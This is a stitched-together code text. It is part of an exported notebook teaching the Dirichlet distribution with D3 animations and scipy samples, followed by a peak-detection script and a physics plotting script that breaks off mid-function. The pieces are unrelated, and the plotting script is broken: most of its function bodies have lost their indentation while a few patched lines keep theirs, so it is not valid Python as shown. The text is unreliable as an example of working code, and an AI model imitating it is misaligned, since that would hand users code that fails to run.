= ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg16,2)\n var cx = ((radius) * Math.cos(x(3))) + (width/2)\n var cy = ((radius) * Math.sin(x(3))) 
+ (height-margin)\n addPeople(cx,cy,1,svg16,3)\n\n }\n long5()\n</script>')
# In[ ]:
# ## The Conclusions
#
# ### ✨1st Conclusion✨
#
# So, let's take a look at the results of all three of these scenarios.
# In[20]:
get_ipython().run_cell_magic('html', '', '<input type="button" value="✨1st Conclusion✨" style="font-size:20px" onclick="conclusion1()">\n<div id="conc"></div>\n\n<script type="text/javascript"> \n var svg17, x, y\n function conclusion1() {\n var equation = ["+","+","+","+","= 1"]\n d3.range(3).forEach((d,row)=>{\n svg17.selectAll("text.equ_"+row)\n // Collect\n .data(equation)\n // Update\n .join("text")\n .attr("class","equ_"+row)\n .attr("x", 0)\n .attr("y", y(row)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d) \n .transition("text2")\n .duration(1000)\n .delay((d,i)=> (5-i) * 100)\n .attr("x", (d,i)=> (i==4) ? (x(i+1)) : (x(i)+x(i+1))/2)\n \n })\n\n\n }\n function conc() {\n var width = 600\n var height = 400\n var margin = 65\n var radius = 200\n \n d3.select("div#conc").select("svg").remove()\n svg17 = d3.select("div#conc").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n x = d3.scaleLinear().range([margin,width-margin]).domain([0,6])\n y = d3.scaleLinear().range([margin,height-margin]).domain([0,2])\n \n fractions = ["1","0","0","0","0"]\n svg17.selectAll("circle.row1")\n .data(fractions)\n .join("circle")\n .attr("class","row1")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(0)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n \n svg17.selectAll("text.perc1")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc1")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(0)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n\n \n fractions = ["1/5","1/5","1/5","1/5","1/5"]\n svg17.selectAll("circle.row2")\n .data(fractions)\n .join("circle")\n .attr("class","row2")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(1)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n\n svg17.selectAll("text.perc2")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc2")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(1)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n\n \n fractions = ["0","0","0","0","1"]\n svg17.selectAll("circle.row3")\n .data(fractions)\n .join("circle")\n .attr("class","row3")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(2)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n\n svg17.selectAll("text.perc3")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc3")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(2)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n\n \n svg17.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(0)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Social Butterfly") \n \n svg17.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(1)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Gambler") \n\n svg17.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(2)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Long Day") \n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n 
// Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", (d,i)=> ((20) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((20) * Math.sin(xc(i))) + cy)\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n\n \n \n }\n var cx = x(0)\n var cy = y(0)\n addPeople(cx,cy,4,svg17,0)\n \n d3.range(4).forEach((d,i) => {\n var cx = x(i)\n var cy = y(1)\n addPeople(cx,cy,1,svg17,i+1)\n \n })\n\n var cx = x(4)\n var cy = y(2)\n addPeople(cx,cy,4,svg17,6)\n\n\n }\n conc()\n</script>')
# Our ✨1st Conclusion✨ is that for each scenario, the probabilities, when added together, equal 1. This is our first connection to the *Dirichlet Distribution*.
# ```{admonition} Dirichlet Distributions Always Sum to 1
# :class: tip
# Regardless of the number of tables (⚪), the number of people at the tables (😃), or the hungry person's (🤔) strategy, the total probability will be 1. This is a defining property of a *probability mass function* (PMF).
# ```
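# We can sanity-check this sum-to-1 property numerically with scipy (a quick sketch; the same import appears again below):
# In[ ]:
from scipy.stats import dirichlet

samples = dirichlet.rvs(alpha=[1, 1, 1, 1, 1], size=3, random_state=0)
print(samples.sum(axis=1))  # every sampled probability vector sums to 1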
# ### ✨2nd Conclusion✨
#
# This is easiest to see with our "The Gambler" scenario.
# In[21]:
get_ipython().run_cell_magic('html', '', '<input type="button" value="✨2nd Conclusion✨" style="font-size:20px" onclick="conclusion2()">\n<div id="conc2"></div>\n\n<script type="text/javascript"> \n var svg18, x, y\n var width = 600\n var height = 400\n var margin = 65\n var radius = 200\n function conclusion2() {\n conc2()\n svg18.selectAll("circle#face_4")\n .transition("move1")\n .duration(1000)\n .attr("cx", (d,i)=> x(5))\n \n svg18.selectAll("text#face_4")\n .transition("move2")\n .duration(1000)\n .attr("x", (d,i)=> x(5))\n \n svg18.selectAll("text#feed_5")\n .transition("move2b")\n .duration(1000)\n .attr("x", (d,i)=> x(5)-20)\n \n svg18.append("line")\n .attr("id","join")\n .attr("x1", (x(3) + x(0))/2)\n .attr("y1", (y(1)+y(0))/2)\n .attr("x2", (x(3) + x(0))/2)\n .attr("y2", (y(1)+y(0))/2)\n .style("stroke", "purple")\n .style("stroke-width", "3px")\n .transition("move3")\n .duration(1000)\n .attr("x1", x(0) - 10)\n .attr("x2", x(3) + 10)\n \n svg18.append("line")\n .attr("id","join")\n .attr("x1", (x(6) + x(4))/2)\n .attr("y1", (y(1)+y(0))/2)\n .attr("x2", (x(6) + x(4))/2)\n .attr("y2", (y(1)+y(0))/2)\n .style("stroke", "steelblue")\n .style("stroke-width", "3px")\n .transition("move4")\n .duration(1000)\n .attr("x1", x(4) - 10)\n .attr("x2", x(6) + 10)\n \n svg18.append("text")\n .attr("id","join")\n .attr("x", (d,i)=> - 10)\n .attr("y", y(1)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("To Join")\n .transition("move5")\n .duration(1000)\n .attr("x", (x(3) + x(0))/2) \n \n svg18.append("text")\n .attr("id","join")\n .attr("x", (d,i)=> width + 10)\n .attr("y", y(1)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("Or Not To Join")\n .transition("move6")\n .duration(1000)\n .attr("x", (x(6) + x(4))/2) \n \n svg18.append("text")\n .attr("id","join")\n .attr("x", (d,i)=> ((x(4) - 10)+(x(3) + 10))/2)\n .attr("y", -10) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("+")\n .transition("move6")\n .duration(1000)\n .attr("y", (y(1)+y(0))/2)\n \n \n function createEquation1(cx,cy,top) {\n svg18.append("text")\n .attr("x", cx)\n .attr("y", height+10) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(top)\n .transition("move6")\n .duration(1000)\n .attr("y", y(2)-15)\n \n svg18.append("line")\n .attr("x1", cx)\n .attr("y1", 0) \n .attr("x2", cx)\n .attr("y2", 0)\n .style("stroke", (top == "🤔") ? "steelblue" : "purple")\n .style("stroke-width", "3px")\n .transition("move7")\n .duration(1000)\n .attr("y1", cy)\n .attr("y2", cy)\n .transition("move8")\n .duration(1000)\n .attr("x1", cx-20)\n .attr("x2", cx+20)\n \n svg18.append("text")\n .attr("x", cx)\n .attr("y", height+10) \n .style("font-size","10px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("😃😃😃😃🤔")\n .transition("move8")\n .duration(1000)\n .attr("y", y(2)+15)\n \n }\n function createEquation2(cx,top) {\n svg18.append("text")\n .attr("x", cx)\n .attr("y", height+10) \n .style("font-size",(top=="= 1") ? 
"30px" : "20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(top)\n .transition("move6")\n .duration(1000)\n .attr("y", y(2))\n\n }\n createEquation1(x(0),y(2),"😃")\n createEquation2((x(0)+x(1))/2,"+")\n \n createEquation1(x(1),y(2),"😃")\n createEquation2((x(1)+x(2))/2,"+") \n \n createEquation1(x(2),y(2),"😃")\n createEquation2((x(2)+x(3))/2,"+")\n \n createEquation1(x(3),y(2),"😃")\n createEquation2((x(3)+x(4))/2,"+")\n \n createEquation1(x(5),y(2),"🤔")\n createEquation2((x(6)),"= 1")\n }\n function conc2() {\n \n d3.select("div#conc2").select("svg").remove()\n svg18 = d3.select("div#conc2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n x = d3.scaleLinear().range([margin,width-margin]).domain([0,6])\n y = d3.scaleLinear().range([margin,height-margin]).domain([0,2])\n \n\n \n fractions = ["1/5","1/5","1/5","1/5","1/5"]\n svg18.selectAll("circle.row2")\n .data(fractions)\n .join("circle")\n .attr("id",(d,i)=> "face_"+i)\n .attr("class","row2")\n .attr("cx", (d,i)=> x(i))\n .attr("cy", y(0)) \n .attr("r", 20)\n .style("fill", "white")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n\n svg18.selectAll("text.perc2")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("id",(d,i)=> "face_"+i)\n .attr("class","perc2")\n .attr("x", (d,i)=> x(i))\n .attr("y", y(0)) \n .style("font-size","20px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n \n svg18.append("text")\n .attr("class","title1")\n .attr("x", 20)\n .attr("y", y(0)-45) \n .style("font-size","20px")\n .style("alignment-baseline","middle")\n .text("The Gambler - 🤔") \n \n\n\n\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("id","feed_"+c)\n .attr("x", (d,i)=> ((20) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((20) * Math.sin(xc(i))) + cy)\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>(c==5)?"🤔":"😃")\n\n \n \n }\n\n \n d3.range(5).forEach((d,i) => {\n var cx = x(i)\n var cy = y(0)\n addPeople(cx,cy,1,svg18,i+1)\n \n })\n\n\n\n }\n conc2()\n</script>')
# ```{admonition} When All Possibilities Are Equally Likely
# :class: tip
# In situations where all possibilities are equally likely (equally likely to sit at a table with someone else (⚪&😃) or to sit at a new table (⚪)), we can abbreviate this to a simple probability:
#
# $\frac{😃}{😃😃😃😃} = \frac{\text{Number of people sitting at the table (⚪&😃)}}{\text{All people (😃😃😃😃)}} = \frac{N_j}{N}$
# ```
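# A quick numeric reading of the $\frac{N_j}{N}$ shorthand, using made-up table counts:
# In[ ]:
import numpy as np

N_j = np.array([2, 1, 1])  # 😃 counts at three occupied tables (made-up numbers)
N = N_j.sum()              # all seated people
print(N_j / N)             # per-table join probabilities: [0.5  0.25 0.25]
print((N_j / N).sum())     # and they still sum to 1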
# In[22]:
from scipy.stats import dirichlet
import numpy as np
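# Below we draw five samples at a time from scipy's Dirichlet distribution while sweeping the concentration parameter `alpha`. Small values (0.01, 0.1) push nearly all of each sample's mass onto a single table, `alpha = 1` gives uniform-random splits, and large values (20, 100) pull every sample toward the even 1/5 split.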
# In[23]:
alpha = np.array([0.01, 0.01, 0.01, 0.01, 0.01])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[24]:
alpha = np.array([0.1, 0.1, 0.1, 0.1, 0.1])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[25]:
alpha = np.array([1, 1, 1, 1, 1])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[26]:
alpha = np.array([5, 5, 5, 5, 5])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[27]:
alpha = np.array([20, 20, 20, 20, 20])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[28]:
alpha = np.array([100, 100, 100, 100, 100])
np.around(dirichlet.rvs(alpha, size=5), decimals=1)
# In[29]:
alpha = np.array([0.01, .1, 1, 10, 10])
np.around(dirichlet.mean(alpha), decimals=3)
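# With an asymmetric `alpha`, `dirichlet.mean` returns each component's expected share, $\alpha_i / \sum_k \alpha_k$.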
# In[ ]:
# ----- findpeaks.py (toyjack/wbKiridashi, MIT license) -----
import numpy as np
from matplotlib import pyplot
import peakutils
from scipy import signal
y=np.array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,6,7,9,10,11,13,15,17,19,21,22,24,25,31,37,46,48,51,53,56,59,60,59,57,56,52,48,46,42,40,38,36,33,32,31,29,28,24,24,25,23,22,21,20,17,16,17,17,18,18,33,43,51,60,67,71,83,86,85,86,84,83,81,70,46,35,33,30,28,22,20,18,18,17,16,15,15,13,12,12,10,10,8,6,5,6,6,7,8,9,11,13,14,14,14,13,12,12,11,12,12,21,25,28,31,32,35,34,37,41,46,45,44,37,31,23,33,35,33,34,38,44,53,60,64,66,60,54,39,32,34,39,41,41,42,47,50,53,65,71,76,54,49,47,44,42,41,39,29,31,28,27,37,44,49,49,49,50,50,47,43,37,30,28,28,29,30,30,32,34,38,49,53,53,54,55,61,58,47,42,36,24,12,10,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,9,13,15,19,21,23,27,30,33,36,36,38,40,51,51,52,55,47,42,40,38,43,46,50,51,48,45,42,41,40,41,43,51,54,54,55,54,54,62,59,60,63,64,60,58,53,50,49,47,43,40,40,37,41,42,43,45,47,49,52,55,54,54,48,46,42,47,59,74,74,63,65,65,67,63,59,57,55,56,57,56,60,68,64,59,57,54,50,49,43,36,36,35,48,56,53,52,50,47,50,48,40,35,31,24,20,19,19,17,17,17,16,15,15,14,13,13,12,11,10,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,6,8,10,13,15,18,19,19,19,20,21,22,23,24,25,26,35,40,45,47,50,54,56,58,59,59,60,61,63,63,63,65,66,66,69,73,75,76,79,78,76,74,73,72,72,73,69,62,53,49,39,32,30,29,24,24,23,22,21,21,20,17,16,16,12,6,6,6,7,7,7,7,7,7,7,7,7,7,7,6,6,6,5,4,1,0,0,0,1,3,5,6,6,6,8,11,15,18,35,41,46,50,54,59,59,60,61,59,61,58,55,54,52,47,34,32,30,30,34,37,43,52,55,57,57,55,53,51,48,46,41,33,29,32,33,51,57,59,70,70,66,59,59,60,63,63,56,52,43,38,37,33,28,28,28,34,41,48,52,56,61,60,61,61,56,52,47,36,27,21,22,22,22,23,24,23,24,26,34,35,38,42,46,45,45,44,44,41,17,9,5,0,0,0,0,0,0,0,5,7,9,10,10,11,11,11,11,11,11,11,11,12,12,13,18,25,29,33,37,40,40,37,38,39,36,34,33,35,35,42,50,59,62,67,64,53,40,38,34,34,37,38,41,50,51,50,51,51,53,53,56,63,73,80,77,55,53,50,47,44,40,37,28,30,34,46,51,49,47,44,42,40,39,38,31,31,31,32,32,32,34,38,43,42,38,38,36,35,33,31,29,28,23,20,17,10,11,12,12,13,13,14,13,12,9,5,0,0,0,0,0,0,9,14,18,22,23,25,29,32,36,36,38,39,42,55,61,62,57,57,59,61,55,51,47,44,42,39,39,41,39,40,40,46,50,53,58,52,53,52,52,51,54,54,57,64,63,64,62,57,57,53,46,47,46,47,46,44,40,47,50,48,60,68,74,80,85,85,90,91,84,75,70,61,59,60,58,57,52,48,45,46,47,45,44,43,43,50,54,54,60,62,59,63,70,69,65,63,62,56,49,45,46,48,45,39,34,22,16,16,15,15,14,14,13,13,11,11,9,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,10,12,22,23,24,27,30,31,30,30,30,33,35,36,39,40,40,40,44,46,51,61,67,71,73,76,79,81,80,79,79,79,79,74,74,74,71,71,72,73,73,74,78,79,83,85,89,91,114,110,111,112,108,108,105,103,101,97,95,91,87,84,81,77,74,70,42,28,26,23,19,13,13,12,10,9,8,6,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,16,24,33,37,40,42,46,49,48,47,46,45,45,44,43,37,34,28,25,26,27,32,33,34,36,40,41,41,41,39,41,41,44,48,53,59,63,68,77,69,67,71,76,80,79,72,69,67,66,64,61,60,64,66,68,63,74,74,75,71,74,72,72,70,71,71,70,69,68,66,67,61,51,49,48,50,45,40,39,38,38,37,36,35,35,33,33,27,19,16,15,12,12,12,12,12,13,12,12,14,14,14,14,14,14,14,12,12,12,11,11,9,9,7,6,4,0,0,0,0,4,7,9,11,13,15,18,21,25,30,31,31,38,39,39,36,37,35,33,35,35,34,28,26,26,24,22,24,23,22,20,22,34,42,43,47,48,50,52,56,52,50,48,47,46,42,43,39,40,39,32,28,22,25,25,26,24,25,25,24,26,29,32,38,46,41,43,48,52,55,51,50,51,50,50,50,53,52,51,51,51,48,48,46,43,41,34,35,34,34,31,29,27,19,12,12,11,11,10,10,9,6,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,5,6,7,8,9,11,12,13,15,15,17,22,28,32,36,39,47,58,58,57,58,57,56,54,55,54,54,55,53,52,46,47,47,49,53,56,59,62,64,64,63,61,63,61,59,58,51,45,35,33,29,27,26,23
,21,20,19,18,17,16,16,14,13,15,15,14,13,11,14,18,20,21,21,21,21,20,20,19,20,20,19,20,20,21,21,30,35,37,38,37,37,36,35,33,32,31,31,33,35,36,36,39,41,42,45,48,49,56,57,56,55,54,53,51,28,24,24,23,23,24,24,24,25,24,25,24,25,26,25,26,26,26,26,26,26,37,42,53,68,76,84,94,96,89,80,76,73,71,66,63,59,57,53,49,46,40,34,25,11,3,0,0,0,0,0,3,5,6,10,12,14,16,19,18,11,7,9,7,8,8,7,9,10,16,18,17,19,23,32,37,36,34,32,28,19,9,6,15,20,21,21,23,22,21,20,18,15,27,44,46,45,43,41,35,23,21,19,21,20,26,33,29,28,27,30,36,40,36,35,31,24,18,20,21,22,38,45,43,40,35,34,32,15,15,18,18,19,18,21,22,20,19,14,14,14,15,14,12,12,12,13,13,14,14,14,14,14,14,14,14,14,14,14,15,15,15,15,16,16,16,15,15,15,14,14,13,11,11,9,9,7,6,2,0,0,0,0,0,0,0,0,0,0,0,13,19,29,43,47,48,48,50,51,48,40,35,30,27,34,38,38,37,41,39,37,37,36,39,43,50,56,71,80,82,82,68,64,66,58,62,60,53,45,40,37,34,29,26,15,17,13,21,31,50,58,60,64,66,66,64,62,56,53,47,41,41,43,38,44,46,46,46,46,45,47,50,52,52,54,56,57,60,62,64,65,65,58,50,49,51,51,54,55,58,59,58,57,57,57,55,58,55,51,48,47,47,45,42,39,44,46,43,42,47,51,39,30,25,20,14,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,9,11,12,12,12,12,12,12,11,15,20,25,28,29,29,31,32,35,34,36,42,49,54,50,46,43,38,35,36,38,50,57,70,71,71,71,76,79,80,85,88,86,82,82,80,82,83,85,85,83,77,74,73,71,68,68,68,65,61,60,57,53,52,55,59,59,58,51,45,42,40,39,42,47,55,64,69,86,99,97,93,90,91,82,75,61,43,25,23,20,18,16,13,11,8,6,0,0,0,0,0,0,0,0,8,13,17,22,23,23,19,20,21,21,21,20,22,23,25,28,31,30,32,34,37,38,39,40,40,41,41,39,32,23,22,21,20,20,18,19,20,21,24,24,25,29,32,37,39,42,47,48,42,45,49,46,40,35,33,33,27,29,25,22,23,26,28,28,37,40,43,46,47,51,51,52,52,52,49,48,49,48,47,36,27,25,25,27,31,33,33,31,26,26,31,32,32,33,27,20,15,11,2,0,0,0,0,0,0,0,0,0,0,0,0,15,22,26,29,35,40,48,50,53,55,55,54,56,53,50,38,42,42,44,55,71,73,72,72,73,72,72,70,66,64,61,59,60,59,61,62,61,62,63,64,67,71,72,74,76,74,69,63,59,56,56,53,53,54,57,58,63,89,96,97,101,100,98,93,88,88,89,90,91,91,90,92,91,82,82,87,95,97,94,91,89,86,79,75,68,61,49,42,33,30,35,38,41,42,43,44,45,45,46,46,46,47,46,46,45,43,41,37,31,29,28,33,35,35,34,32,29,23,20,19,18,16,16,15,14,13,11,11,9,8,5,0,0,0,0,3,11,21,22,23,22,21,20,19,17,17,16,16,21,25,27,27,26,26,25,29,28,29,33,35,40,43,44,46,49,53,58,60,60,60,56,48,39,32,32,37,36,38,44,46,46,47,48,49,51,51,50,49,48,49,50,49,41,37,30,27,26,28,38,42,45,48,51,52,55,57,59,60,66,72,52,48,35,20,17,10,10,10,10,10,10,10,10,10,10,9,9,8,8,7,7,5,0,0,0,0,3,5,5,7,7,8,8,9,10,10,9,8,8,7,5,0,0,0,0,0,0,0,0,0,0,0,0,4,13,25,27,29,30,27,15,15,15,16,15,16,16,16,16,15,14,14,11,0,4,6,7,7,7,7,6,6,6,8,11,13,14,14,15,16,16,17,19,19,20,20,21,20,21,20,19,18,17,17,16,16,15,14,12,12,11,10,10,9,8,7,5,15,19,20,21,21,23,27,41,44,46,48,48,45,45,43,42,40,39,34,22,19,18,18,19,19,20,21,27,38,42,42,42,42,42,45,44,44,46,52,60,61,60,59,56,48,44,43,45,44,43,41,40,43,42,43,46,46,50,51,52,48,44,41,42,41,46,55,58,57,57,50,57,59,58,59,60,59,46,52,53,53,53,53,54,53,53,51,47,44,38,33,29,30,30,30,29,28,27,25,25,24,24,24,24,24,25,27,29,33,32,31,30,29,29,29,30,30,30,30,34,32,25,11,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,16,21,22,20,18,16,14,10,5,0,0,0,0,6,11,13,15,17,19,21,20,18,18,19,20,17,16,16,14,20,26,26,25,24,25,25,22,21,19,18,19,20,25,33,37,41,46,50,55,57,58,43,29,23,32,34,38,41,45,52,53,53,55,53,50,48,60,67,66,64,71,73,75,77,82,79,74,72,71,56,51,49,49,47,47,46,36,30,27,26,22,22,21,20,19,17,14,14,17,18,19,21,23,25,29,35,40,37,31,26,20,15,8,4,0,0,0,0,0,0,0,0,0,7,12,14,15,16,16,15,14,13,11,11,11,11,11,11,11,11,11,11,10,15,17,24,36,41,42,44,47,38,33,34,35,36,36,36,37,38,39,39,41,58,
60,63,66,71,72,73,71,62,62,61,65,66,67,80,81,80,80,80,80,78,69,63,55,52,51,49,47,46,54,60,63,63,63,57,54,51,48,44,38,42,42,42,49,61,63,63,62,55,51,45,43,37,36,50,51,51,50,51,54,51,46,44,41,36,32,34,36,41,51,61,59,58,59,56,53,50,47,44,39,36,30,21,15,14,12,9,6,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])
x = np.arange(len(y))
# Smooth the raw shadow profile with a Savitzky-Golay filter (window 51, polynomial order 5)
y1 = signal.savgol_filter(y, 51, 5)
# Detect peaks in both the raw and the smoothed signal
indexes = peakutils.indexes(y, thres=0.6, min_dist=20)
indexes1 = peakutils.indexes(y1, thres=0.5, min_dist=20)
print(max(y), sum(y) / len(y))      # maximum value and mean level of the raw signal
print(len(indexes), len(indexes1))  # number of peaks found in each signal
pyplot.plot(x, y, label="shadow")
pyplot.plot(x, y1, label='smooth shadow')
pyplot.plot(x[indexes], y[indexes], 'o', color='r')
pyplot.plot(x[indexes1], y1[indexes1], 'o', color='b')
pyplot.title('Graph of Shadow')
pyplot.xlabel('Width')
pyplot.ylabel('Pixels')
pyplot.legend()
pyplot.show()
# ----- make_plot.py (weinbe58/tfim_noise, BSD-3-Clause license) -----
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib.lines import Line2D
import numpy as np
import glob,sys,os
def marker_style(i):
color = ['red','green','blue','fuchsia','yellow','orange','aqua','lime','teal']
n_color = len(color)
n_marker = len(Line2D.filled_markers)
markers = Line2D.filled_markers
fillstyle = ["full","none","top","bottom","left","right"]
j = i % n_color
jj = (i // n_color) % len(fillstyle)
return dict(color=color[j],marker=markers[j],fillstyle=fillstyle[jj])
def plot(ax,filedict,ncol,ecol=None,xlabel=None,ylabel=None,keys=None,logx=True,logy=False,legend_opts={},
xscale=0.0,yscale=0.0,yshift=None,xshift=None,xlim=None,ylim=None,legend=False):
if xshift is None:
xshift = lambda v,L:0.0
if yshift is None:
yshift = lambda v,L:0.0
    if keys is None:
        keys = filedict.keys()
    # Python 3 fix: dict views have no .sort(), so build a sorted list keyed on system size L
    keys = sorted(keys, key=lambda x: x[0])
for i,key in enumerate(keys):
L,label = key
data =filedict[key]
v = data[:,0]
y = (data[:,ncol]-yshift(v,L))*L**yscale
x = (v-xshift(v,L))*L**xscale
if ecol is not None:
err = data[:,ecol]*L**yscale
ax.errorbar(x,y,err,label=label,markersize=3,linewidth=1,**marker_style(i))
else:
ax.plot(x,y,label=label,markersize=3,linewidth=1,**marker_style(i))
if logx:
ax.set_xscale("log", nonposx='clip')
ax.xaxis.set_major_locator(ticker.LogLocator(base=10.0, numticks=15))
if logy:
ax.set_yscale("log", nonposy='clip')
ax.yaxis.set_major_locator(ticker.LogLocator(base=10.0, numticks=15))
if xlabel is not None:
ax.set_xlabel(xlabel,fontsize=10)
if ylabel is not None:
ax.set_ylabel(ylabel,fontsize=10)
if xlim is not None:
ax.set_xlim(xlim)
if ylim is not None:
ax.set_ylim(ylim)
if legend:
ax.legend(**legend_opts)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(7)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(7)
ax.tick_params(axis="both",which="both",direction="in")
def spin_bath_1d_2():
datafile = "data/spin_bath_2.npz"
runs = np.load(datafile)
    # Python 3 fixes: sort a list copy of the archive keys and use print()
    keys = sorted(runs.keys())
    print(keys)
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
    print(data.shape)
for i,L in enumerate(L_list):
try:
n,m = L
if n == 0:
key = (m,"$L={}$".format(int(m)))
else:
key = (np.sqrt(n**2+m**2),r"$L=\sqrt{{{}}}$".format(n**2+m**2))
mask = T_list > 0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,0,0,i]))
yscale=-1.0
except TypeError:
if L < 10: continue
key = (L,"$L={}$".format(int(L)))
mask = T_list >= L**2/10.0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,i,mask,0,0]))
# d = np.hstack((np.atleast_2d(1/T_list).T,data[i,mask,0]))
# d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,-1,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_xy_scale_2.pdf"),bbox_inches="tight")
plt.clf()
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
xscale = 3.0
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^3$",
ylabel="$Q(v,L)$",xscale=xscale,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
xmin,xmax = ax2.get_xlim()
ymin,ymax = ax2.get_ylim()
# x = np.linspace(xmin,xmax,1000)
# ax2.plot(x,x**(-1),label="linear")
# ax2.set_ylim(ymin,ymax)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_xy_scale_3.pdf"),bbox_inches="tight")
def spin_bath_1d_5():
datafile = "data/spin_bath_5.npz"
runs = np.load(datafile)
keys = sorted(runs.keys())
print(keys)
data = runs["data"]
